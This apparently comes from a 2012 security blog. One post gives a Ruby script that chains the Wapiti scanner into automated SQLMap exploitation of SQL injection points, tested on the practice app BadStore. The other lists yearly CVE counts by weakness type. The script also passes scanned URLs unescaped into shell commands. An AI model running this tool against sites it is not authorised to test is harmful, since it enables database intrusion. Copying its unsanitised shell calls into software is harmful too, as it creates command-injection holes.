Sunday, May 20, 2012

Automating SQLMap with data from wapiti

Wapiti is really fast at finding possible sql injection points in a web application or website. SQLMap is great at figuring out how to exploit these possible injection points. The following script runs Wapiti on a host to find possible injection points, then passes that data to SQLMap to try and exploit. Tested on BadStore and running SVN latest of both Wapiti and SQLMap. You can play around with the arguments I am passing to SQLMap and make the scans a bit more thorough, but at the expense of speed.
#!/usr/bin/env ruby
 
require 'active_support/secure_random'
require 'rexml/document'
 
wapiti_path = '/home/bperry/tools/wapiti/trunk/src/'
sqlmap_path = '/home/bperry/tools/sqlmap/'
 
wapiti_report_path = '/tmp/wapiti_report_' + SecureRandom.uuid + '.xml'
 
remote_host = ARGV[0]
 
p "Running wapiti..."
`#{wapiti_path}wapiti.py #{ARGV[0]} -f xml -o #{wapiti_report_path}`
 
p "Report saved to #{wapiti_report_path}"
 
p "Parsing results"
 
results = []
 
report = ::File.open(wapiti_report_path, "rb")
doc = REXML::Document.new report.read
 
doc.elements.each('/report/bugTypeList/bugType') do |element|
        bug_type = element.attributes["name"]
 
        next if bug_type != "SQL Injection"
 
        p "Parsing " + bug_type
 
        result = {}
        element.elements.each("bugList/bug") do |bug|
                result[:type] = bug_type
               
                bug.elements.each do |child|
                        if child.name == "url"
                                result[:url] = child.text
                        elsif child.name == "parameter"
                                result[:parameter] = child.text
                        end
                end
                results << result
                result = {}
        end
end
 
results.each do |result|
        next if result[:type] !~ /SQL Injection/
        p "Running sqlmap"
       
        if result[:url].index(result[:parameter])
                url = result[:url].gsub("%BF%27%22%28", "abcd")
       
                params = result[:url].split("?")[1].split("&")
 
                skipped_params = []
                params.each do |param|
                        skipped_params << param.split("=")[0] if not param.index("%BF%27%22%28")
                end
                       
                p "Running GET sql injection test on url: " + url
                sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --smart --skip=\"#{skipped_params.join(",")}\" --technique=EUS --flush-session --fresh-queries --level=2 --batch"
                out = `#{sqlmap_command}`
                printf out
        else
                url = result[:url]
                p "Running POST sql injection test on url: " + url
                p "With data: " + result[:parameter]
 
                parameter = result[:parameter].gsub("%BF%27%22%28", "abcd")
 
                params = result[:parameter].split("&")
 
                skipped_params = []
                params.each do |param|
                        skipped_params << param.split("=")[0] if not param.index("%BF%27%22%28")
                end
 
                sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --data=\"#{parameter}\"  --skip=\"#{skipped_params.join(",")}\" --smart --technique=EUS --flush-session --fresh-queries --level=2 --batch"
                p sqlmap_command
                sqlmap_output = `#{sqlmap_command}`
               
                printf sqlmap_output
        end
end

Monday, May 7, 2012

Simple CVE stats from 2001-2011

Year 2001 has 1538 vulnerabilities
2001 had 8 vulns of type:  Buffer Errors
2001 had 4 vulns of type:  Cryptographic Issues
2001 had 4 vulns of type:  Path Traversal
2001 had 2 vulns of type:  Authentication Issues
2001 had 2 vulns of type:  Permissions, Privileges, and Access Control
2001 had 2 vulns of type:  Code Injection
2001 had 2 vulns of type:  Input Validation
2001 had 1 vulns of type:  Resource Management Errors
2001 had 1 vulns of type:  Link Following
2001 had 0 vulns of type:  Credentials Management
2001 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
2001 had 0 vulns of type:  Cross-Site Scripting
2001 had 0 vulns of type:  Format String Vulnerability
2001 had 0 vulns of type:  Configuration
2001 had 0 vulns of type:  Information Leak / Disclosure
2001 had 0 vulns of type:  Numeric Errors
2001 had 0 vulns of type:  OS Command Injections
2001 had 0 vulns of type:  Race Conditions
2001 had 0 vulns of type:  SQL Injection
Total vulns in 2001 with CWE: 26
Percentage of vulns with CWE: 1.69050715214564%


Year 2002 has 2368 vulnerabilities
2002 had 41 vulns of type:  Buffer Errors
2002 had 32 vulns of type:  Permissions, Privileges, and Access Control
2002 had 32 vulns of type:  Cross-Site Scripting
2002 had 29 vulns of type:  Input Validation
2002 had 17 vulns of type:  Information Leak / Disclosure
2002 had 13 vulns of type:  Path Traversal
2002 had 9 vulns of type:  Configuration
2002 had 8 vulns of type:  Credentials Management
2002 had 8 vulns of type:  Code Injection
2002 had 7 vulns of type:  SQL Injection
2002 had 6 vulns of type:  Numeric Errors
2002 had 6 vulns of type:  Resource Management Errors
2002 had 5 vulns of type:  Authentication Issues
2002 had 3 vulns of type:  Cryptographic Issues
2002 had 2 vulns of type:  Race Conditions
2002 had 2 vulns of type:  Link Following
2002 had 1 vulns of type:  Cross-Site Request Forgery (CSRF)
2002 had 1 vulns of type:  Format String Vulnerability
2002 had 1 vulns of type:  OS Command Injections
Total vulns in 2002 with CWE: 223
Percentage of vulns with CWE: 9.41722972972973%


Year 2003 has 1515 vulnerabilities
2003 had 59 vulns of type:  Buffer Errors
2003 had 40 vulns of type:  Cross-Site Scripting
2003 had 30 vulns of type:  Input Validation
2003 had 25 vulns of type:  Information Leak / Disclosure
2003 had 24 vulns of type:  Permissions, Privileges, and Access Control
2003 had 17 vulns of type:  Path Traversal
2003 had 13 vulns of type:  Code Injection
2003 had 12 vulns of type:  Configuration
2003 had 12 vulns of type:  SQL Injection
2003 had 9 vulns of type:  Authentication Issues
2003 had 9 vulns of type:  Credentials Management
2003 had 8 vulns of type:  Cryptographic Issues
2003 had 6 vulns of type:  Resource Management Errors
2003 had 4 vulns of type:  Numeric Errors
2003 had 2 vulns of type:  Format String Vulnerability
2003 had 2 vulns of type:  Race Conditions
2003 had 2 vulns of type:  Link Following
2003 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
2003 had 0 vulns of type:  OS Command Injections
Total vulns in 2003 with CWE: 274
Percentage of vulns with CWE: 18.0858085808581%


Year 2004 has 2669 vulnerabilities
2004 had 30 vulns of type:  Buffer Errors
2004 had 22 vulns of type:  Permissions, Privileges, and Access Control
2004 had 20 vulns of type:  Cross-Site Scripting
2004 had 9 vulns of type:  Path Traversal
2004 had 9 vulns of type:  Input Validation
2004 had 8 vulns of type:  SQL Injection
2004 had 6 vulns of type:  Authentication Issues
2004 had 6 vulns of type:  Credentials Management
2004 had 6 vulns of type:  Code Injection
2004 had 5 vulns of type:  Configuration
2004 had 4 vulns of type:  Information Leak / Disclosure
2004 had 4 vulns of type:  Resource Management Errors
2004 had 3 vulns of type:  Cryptographic Issues
2004 had 3 vulns of type:  Format String Vulnerability
2004 had 2 vulns of type:  Race Conditions
2004 had 2 vulns of type:  Link Following
2004 had 1 vulns of type:  Numeric Errors
2004 had 1 vulns of type:  OS Command Injections
2004 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
Total vulns in 2004 with CWE: 141
Percentage of vulns with CWE: 5.28287748220307%


Year 2005 has 4684 vulnerabilities
2005 had 64 vulns of type:  Buffer Errors
2005 had 48 vulns of type:  SQL Injection
2005 had 32 vulns of type:  Permissions, Privileges, and Access Control
2005 had 31 vulns of type:  Resource Management Errors
2005 had 28 vulns of type:  Cross-Site Scripting
2005 had 21 vulns of type:  Input Validation
2005 had 20 vulns of type:  Code Injection
2005 had 18 vulns of type:  Information Leak / Disclosure
2005 had 15 vulns of type:  Numeric Errors
2005 had 10 vulns of type:  Path Traversal
2005 had 5 vulns of type:  Link Following
2005 had 4 vulns of type:  Authentication Issues
2005 had 3 vulns of type:  Cryptographic Issues
2005 had 3 vulns of type:  Configuration
2005 had 2 vulns of type:  Credentials Management
2005 had 2 vulns of type:  Race Conditions
2005 had 1 vulns of type:  Cross-Site Request Forgery (CSRF)
2005 had 1 vulns of type:  Format String Vulnerability
2005 had 1 vulns of type:  OS Command Injections
Total vulns in 2005 with CWE: 309
Percentage of vulns with CWE: 6.59692570452605%


Year 2006 has 7043 vulnerabilities
2006 had 199 vulns of type:  Code Injection
2006 had 145 vulns of type:  Buffer Errors
2006 had 87 vulns of type:  Cross-Site Scripting
2006 had 84 vulns of type:  SQL Injection
2006 had 74 vulns of type:  Resource Management Errors
2006 had 63 vulns of type:  Input Validation
2006 had 50 vulns of type:  Permissions, Privileges, and Access Control
2006 had 37 vulns of type:  Numeric Errors
2006 had 29 vulns of type:  Information Leak / Disclosure
2006 had 21 vulns of type:  Path Traversal
2006 had 17 vulns of type:  Format String Vulnerability
2006 had 14 vulns of type:  Authentication Issues
2006 had 8 vulns of type:  Cryptographic Issues
2006 had 7 vulns of type:  Race Conditions
2006 had 6 vulns of type:  Configuration
2006 had 5 vulns of type:  Credentials Management
2006 had 3 vulns of type:  Cross-Site Request Forgery (CSRF)
2006 had 2 vulns of type:  OS Command Injections
2006 had 1 vulns of type:  Link Following
Total vulns in 2006 with CWE: 852
Percentage of vulns with CWE: 12.0971177055232%


Year 2007 has 6505 vulnerabilities
2007 had 451 vulns of type:  Buffer Errors
2007 had 366 vulns of type:  Cross-Site Scripting
2007 had 296 vulns of type:  Code Injection
2007 had 263 vulns of type:  SQL Injection
2007 had 229 vulns of type:  Permissions, Privileges, and Access Control
2007 had 228 vulns of type:  Input Validation
2007 had 164 vulns of type:  Path Traversal
2007 had 107 vulns of type:  Numeric Errors
2007 had 104 vulns of type:  Resource Management Errors
2007 had 96 vulns of type:  Information Leak / Disclosure
2007 had 69 vulns of type:  Authentication Issues
2007 had 41 vulns of type:  Cross-Site Request Forgery (CSRF)
2007 had 36 vulns of type:  Configuration
2007 had 31 vulns of type:  Format String Vulnerability
2007 had 25 vulns of type:  Link Following
2007 had 24 vulns of type:  Credentials Management
2007 had 19 vulns of type:  Cryptographic Issues
2007 had 18 vulns of type:  Race Conditions
2007 had 6 vulns of type:  OS Command Injections
Total vulns in 2007 with CWE: 2573
Percentage of vulns with CWE: 39.554189085319%


Year 2008 has 7031 vulnerabilities
2008 had 1480 vulns of type:  SQL Injection
2008 had 981 vulns of type:  Cross-Site Scripting
2008 had 582 vulns of type:  Buffer Errors
2008 had 574 vulns of type:  Permissions, Privileges, and Access Control
2008 had 467 vulns of type:  Input Validation
2008 had 447 vulns of type:  Path Traversal
2008 had 385 vulns of type:  Code Injection
2008 had 322 vulns of type:  Resource Management Errors
2008 had 222 vulns of type:  Authentication Issues
2008 had 221 vulns of type:  Information Leak / Disclosure
2008 had 177 vulns of type:  Link Following
2008 had 166 vulns of type:  Numeric Errors
2008 had 119 vulns of type:  Cross-Site Request Forgery (CSRF)
2008 had 69 vulns of type:  Credentials Management
2008 had 61 vulns of type:  Cryptographic Issues
2008 had 41 vulns of type:  Configuration
2008 had 33 vulns of type:  Format String Vulnerability
2008 had 25 vulns of type:  Race Conditions
2008 had 12 vulns of type:  OS Command Injections
Total vulns in 2008 with CWE: 6384
Percentage of vulns with CWE: 90.797895036268%


Year 2009 has 4848 vulnerabilities
2009 had 734 vulns of type:  Cross-Site Scripting
2009 had 673 vulns of type:  SQL Injection
2009 had 558 vulns of type:  Buffer Errors
2009 had 329 vulns of type:  Permissions, Privileges, and Access Control
2009 had 266 vulns of type:  Code Injection
2009 had 247 vulns of type:  Input Validation
2009 had 245 vulns of type:  Path Traversal
2009 had 237 vulns of type:  Resource Management Errors
2009 had 164 vulns of type:  Numeric Errors
2009 had 148 vulns of type:  Authentication Issues
2009 had 141 vulns of type:  Information Leak / Disclosure
2009 had 86 vulns of type:  Cryptographic Issues
2009 had 84 vulns of type:  Cross-Site Request Forgery (CSRF)
2009 had 56 vulns of type:  Credentials Management
2009 had 47 vulns of type:  Configuration
2009 had 32 vulns of type:  Race Conditions
2009 had 29 vulns of type:  Link Following
2009 had 23 vulns of type:  Format String Vulnerability
2009 had 11 vulns of type:  OS Command Injections
Total vulns in 2009 with CWE: 4110
Percentage of vulns with CWE: 84.7772277227723%


Year 2010 has 4696 vulnerabilities
2010 had 578 vulns of type:  SQL Injection
2010 had 566 vulns of type:  Cross-Site Scripting
2010 had 536 vulns of type:  Buffer Errors
2010 had 319 vulns of type:  Permissions, Privileges, and Access Control
2010 had 299 vulns of type:  Input Validation
2010 had 270 vulns of type:  Resource Management Errors
2010 had 256 vulns of type:  Path Traversal
2010 had 248 vulns of type:  Code Injection
2010 had 162 vulns of type:  Information Leak / Disclosure
2010 had 154 vulns of type:  Numeric Errors
2010 had 66 vulns of type:  Cross-Site Request Forgery (CSRF)
2010 had 62 vulns of type:  Cryptographic Issues
2010 had 56 vulns of type:  Authentication Issues
2010 had 51 vulns of type:  Credentials Management
2010 had 33 vulns of type:  Race Conditions
2010 had 26 vulns of type:  Link Following
2010 had 21 vulns of type:  Configuration
2010 had 12 vulns of type:  Format String Vulnerability
2010 had 12 vulns of type:  OS Command Injections
Total vulns in 2010 with CWE: 3727
Percentage of vulns with CWE: 79.3654173764906%


Year 2011 has 3733 vulnerabilities
2011 had 648 vulns of type:  Buffer Errors
2011 had 372 vulns of type:  Input Validation
2011 had 367 vulns of type:  Cross-Site Scripting
2011 had 366 vulns of type:  Resource Management Errors
2011 had 295 vulns of type:  Information Leak / Disclosure
2011 had 285 vulns of type:  Permissions, Privileges, and Access Control
2011 had 120 vulns of type:  Numeric Errors
2011 had 107 vulns of type:  SQL Injection
2011 had 92 vulns of type:  Code Injection
2011 had 91 vulns of type:  Path Traversal
2011 had 60 vulns of type:  Authentication Issues
2011 had 57 vulns of type:  Cross-Site Request Forgery (CSRF)
2011 had 57 vulns of type:  Cryptographic Issues
2011 had 34 vulns of type:  Configuration
2011 had 32 vulns of type:  Credentials Management
2011 had 26 vulns of type:  Link Following
2011 had 14 vulns of type:  Race Conditions
2011 had 13 vulns of type:  OS Command Injections
2011 had 8 vulns of type:  Format String Vulnerability
Total vulns in 2011 with CWE: 3044
Percentage of vulns with CWE: 81.5429949102599%
Total: 49439
To be honest, I am a bit dismayed at the quality of the data. 2001 only categorized 1.7% of the vulns recorded (I am sure most, if not all, were added retroactively). The highest percentage of vulns that had been categorized was 90% in 2008. I find it interesting that the first few years are dominated by buffer overflows (perhaps because of poor data), and then around 2008, web vulns become the top recorded and categorized. Perhaps this is because of the vast amount new web technologies emerging. That is, until 2011 where buffer overflows are once again the most. I used the xml files from the NIST and my source code that I used to generate the stats is on github. Using LINQ, so it isn't super speedy. Takes a few minutes. Works with Mono or .NET.